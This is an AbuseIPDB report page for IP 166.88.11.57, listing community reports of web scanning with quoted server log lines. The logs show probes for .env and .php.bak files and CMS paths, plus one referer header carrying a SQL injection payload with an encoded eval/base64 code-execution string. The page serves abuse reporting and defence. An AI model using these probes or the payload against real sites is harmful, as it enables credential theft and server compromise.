JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

AbuseIPDB » 166.88.11.57

166.88.11.57 was found in our database!

This IP was reported 22 times. Confidence of Abuse is 0%: ?

ISP	Evoxt (HK)
Usage Type	Data Center/Web Hosting/Transit
ASN	AS149440
Domain Name	evoxt.com
Country	🇭🇰 Hong Kong
City	Hong Kong

IP info including ISP, Usage Type, and Location provided by IPInfo. Updated weekly.

Report 166.88.11.57

Whois 166.88.11.57

IP Abuse Reports for 166.88.11.57:

This IP address has been reported a total of 22 times from 15 distinct sources. 166.88.11.57 was first reported on September 6th 2024, and the most recent report was 1 year ago.

Old Reports: The most recent abuse report for this IP address is from 1 year ago . It is possible that this IP is no longer involved in abusive activities.

Reporter	IoA Timestamp (UTC)	Comment	Categories
🇱🇰 csoc	2024-10-07 22:04:00 (1 year ago)	166.88.11.57	Web App Attack
🇺🇸 TPI-Abuse	2024-09-25 19:57:39 (1 year ago)	(mod_security) mod_security (id:210492) triggered by 166.88.11.57 (-): 1 in the last 300 secs; Ports ... show more (mod_security) mod_security (id:210492) triggered by 166.88.11.57 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Wed Sep 25 15:57:33.562496 2024] [security2:error] [pid 3515742:tid 3515742] [client 166.88.11.57:62893] [client 166.88.11.57] ModSecurity: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.homehealth101.com"] [uri "/.env"] [unique_id "ZvRrLaCzZw9u4fU475jbowAAAA4"], referer: http://www.homehealth101.com/.env show less	Brute-Force Bad Web Bot Web App Attack
🇸🇬 mypatricks	2024-09-25 03:45:38 (1 year ago)	166.88.11.57 \| Port: 51950 \| DNS: 166.88.11.57 2024-09-25T11:45:37+08:00 Asia/Hong_Kong \| Fake Baidu ... show more 166.88.11.57 \| Port: 51950 \| DNS: 166.88.11.57 2024-09-25T11:45:37+08:00 Asia/Hong_Kong \| Fake Baiduspider Detected \| UA: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html HTTP/1.1 443 GET \| URL: / \| Ref: http://xxxxxx \| Country: HK/Hong Kong/+08:00 IP City: 8c8805c03b571fbb-HKG/Hong Kong 1 hits/0 secs Robots 0 show less	Web Spam Blog Spam Brute-Force Exploited Host Web App Attack
🇺🇸 rdpguard.com	2024-09-25 03:30:05 (1 year ago)	RdpGuard detected brute-force attempt on HTTP	Brute-Force
🇬🇧 CrystalMaker	2024-09-24 23:55:28 (1 year ago)	Vulnerability scan - GET /.env	Hacking
🇸🇬 Charles	2024-09-24 06:22:20 (1 year ago)	166.88.11.57 - - [24/Sep/2024:14:22:19 +0800] "GET /.env HTTP/1.1" 404 2050 "https://amstar.tw/.env" ... show more 166.88.11.57 - - [24/Sep/2024:14:22:19 +0800] "GET /.env HTTP/1.1" 404 2050 "https://amstar.tw/.env" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html" ... show less	Web Spam Email Spam Brute-Force Bad Web Bot Web App Attack SSH
🇺🇸 TPI-Abuse	2024-09-24 06:07:21 (1 year ago)	(mod_security) mod_security (id:210492) triggered by 166.88.11.57 (-): 1 in the last 300 secs; Ports ... show more (mod_security) mod_security (id:210492) triggered by 166.88.11.57 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Tue Sep 24 02:07:15.628732 2024] [security2:error] [pid 10727:tid 10727] [client 166.88.11.57:62626] [client 166.88.11.57] ModSecurity: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.studioarts.net"] [uri "/.env"] [unique_id "ZvJXE05neu1EyXzv4d4JvQAAAAk"], referer: http://www.studioarts.net/.env show less	Brute-Force Bad Web Bot Web App Attack
🇺🇸 TPI-Abuse	2024-09-23 20:53:29 (1 year ago)	(mod_security) mod_security (id:210492) triggered by 166.88.11.57 (-): 1 in the last 300 secs; Ports ... show more (mod_security) mod_security (id:210492) triggered by 166.88.11.57 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Mon Sep 23 16:53:21.838482 2024] [security2:error] [pid 17866:tid 17866] [client 166.88.11.57:53966] [client 166.88.11.57] ModSecurity: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.backstore.com"] [uri "/.env"] [unique_id "ZvHVQR4gA3Z9Bk3Im9LUjQAAAAw"], referer: http://www.backstore.com/.env show less	Brute-Force Bad Web Bot Web App Attack
🇺🇸 TPI-Abuse	2024-09-23 13:00:09 (1 year ago)	(mod_security) mod_security (id:210492) triggered by 166.88.11.57 (-): 1 in the last 300 secs; Ports ... show more (mod_security) mod_security (id:210492) triggered by 166.88.11.57 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Mon Sep 23 08:59:58.676522 2024] [security2:error] [pid 30808:tid 30808] [client 166.88.11.57:55944] [client 166.88.11.57] ModSecurity: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.renju.net"] [uri "/.env"] [unique_id "ZvFmTtPUVH7065ARr3ifNgAAAAI"], referer: http://www.renju.net/.env show less	Brute-Force Bad Web Bot Web App Attack
🇺🇸 TPI-Abuse	2024-09-23 10:35:19 (1 year ago)	(mod_security) mod_security (id:210492) triggered by 166.88.11.57 (-): 1 in the last 300 secs; Ports ... show more (mod_security) mod_security (id:210492) triggered by 166.88.11.57 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Mon Sep 23 06:35:14.461883 2024] [security2:error] [pid 6980:tid 6980] [client 166.88.11.57:59398] [client 166.88.11.57] ModSecurity: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.namefinder.com"] [uri "/.env"] [unique_id "ZvFEYvdpciaORebKxJ-C0gAAAAc"], referer: http://www.namefinder.com/.env show less	Brute-Force Bad Web Bot Web App Attack
🇺🇸 mw	2024-09-12 13:50:23 (1 year ago)	166.88.11.57 - - [12/Sep/2024:08:50:19 -0500] "GET /include/dialog/select_images_post.php HTTP/1.1" ... show more 166.88.11.57 - - [12/Sep/2024:08:50:19 -0500] "GET /include/dialog/select_images_post.php HTTP/1.1" 404 162 "http://www.kencook.com/include/dialog/select_images_post.php" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html\x09" 166.88.11.57 - - [12/Sep/2024:08:50:19 -0500] "GET /include/dialog/select_images_post.php HTTP/1.1" 404 162 "http://www.kencook.com/include/dialog/select_images_post.php" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html\x09" 166.88.11.57 - - [12/Sep/2024:08:50:20 -0500] "GET /include/dialog/select_templets_post.php HTTP/1.1" 404 162 "http://www.kencook.com/include/dialog/select_templets_post.php" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html\x09" 166.88.11.57 - - [12/Sep/2024:08:50:20 -0500] "GET /uc_server/data/config.inc.php.bak HTTP/1.1" 404 179189 "http://www.kencook.com/uc_server/data/config.inc.php.bak" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http:/ ... show less	Bad Web Bot Web App Attack
🇧🇪 cmbplf	2024-09-12 09:29:31 (1 year ago)	150 requests to *.php.bak	Brute-Force Bad Web Bot
Anonymous	2024-09-10 15:24:21 (1 year ago)	Fail2Ban apache-noscript	Bad Web Bot
🇺🇸 mw	2024-09-10 07:38:59 (1 year ago)	166.88.11.57 - - [10/Sep/2024:02:38:45 -0500] "GET /user.php HTTP/1.1" 404 136 "554fcae493e564ee0dc7 ... show more 166.88.11.57 - - [10/Sep/2024:02:38:45 -0500] "GET /user.php HTTP/1.1" 404 136 "554fcae493e564ee0dc75bdf2ebf94caads\|a:2:{s:3:\x22num\x22;s:193:\x22/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b6576616c09286261736536345f6465636f64650928275a585a686243676b5831425055315262634841784d6a4e644b54733d2729293b2f2f7d787878,10-- -\x22;s:2:\x22id\x22;s:11:\x22-1' UNION/\x22;}554fcae493e564ee0dc75bdf2ebf94ca" "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0" 166.88.11.57 - - [10/Sep/2024:02:38:46 -0500] "GET /e/install/index.php?enews=setdb&f=4 HTTP/1.1" 404 162 "http://www.kencook.com/e/install/index.php?enews=setdb&f=4" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html\x09" 166.88.11.57 - - [10/Sep/2024:02:38:47 -0500] "GET /admin/event/uploadimg.html HTTP/1.1" 404 185052 "http://www.kencook.com/admin/event/uploadimg.html" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html\x09" 166.88.11.57 - ... show less	Bad Web Bot Web App Attack
Anonymous	2024-09-10 02:28:49 (1 year ago)	sql injection	Web App Attack

Showing 1 to 15 of 22 reports

Think this IP has been falsely reported? You may request to have the associated reports reviewed and removed. Request Takedown 🚩

Recently Reported IPs:

🇭🇰 202.82.20.241

🇩🇪 185.242.3.195

🇦🇷 181.23.51.79

🇳🇱 91.92.40.45

🇧🇬 79.124.62.134

🇺🇸 74.82.47.30

🇹🇷 45.136.5.55

🇭🇰 35.220.135.196

🇺🇸 34.125.185.110

🇧🇪 34.52.236.5

🇦🇺 34.40.201.45

🇺🇸 18.118.146.174

🇩🇪 217.154.155.115

🇺🇸 216.73.161.204

🇵🇱 212.127.90.201

🇺🇸 209.85.210.194

🇺🇸 199.127.62.250

🇮🇷 193.228.168.69

🇩🇪 178.16.52.109

🇺🇸 161.35.53.189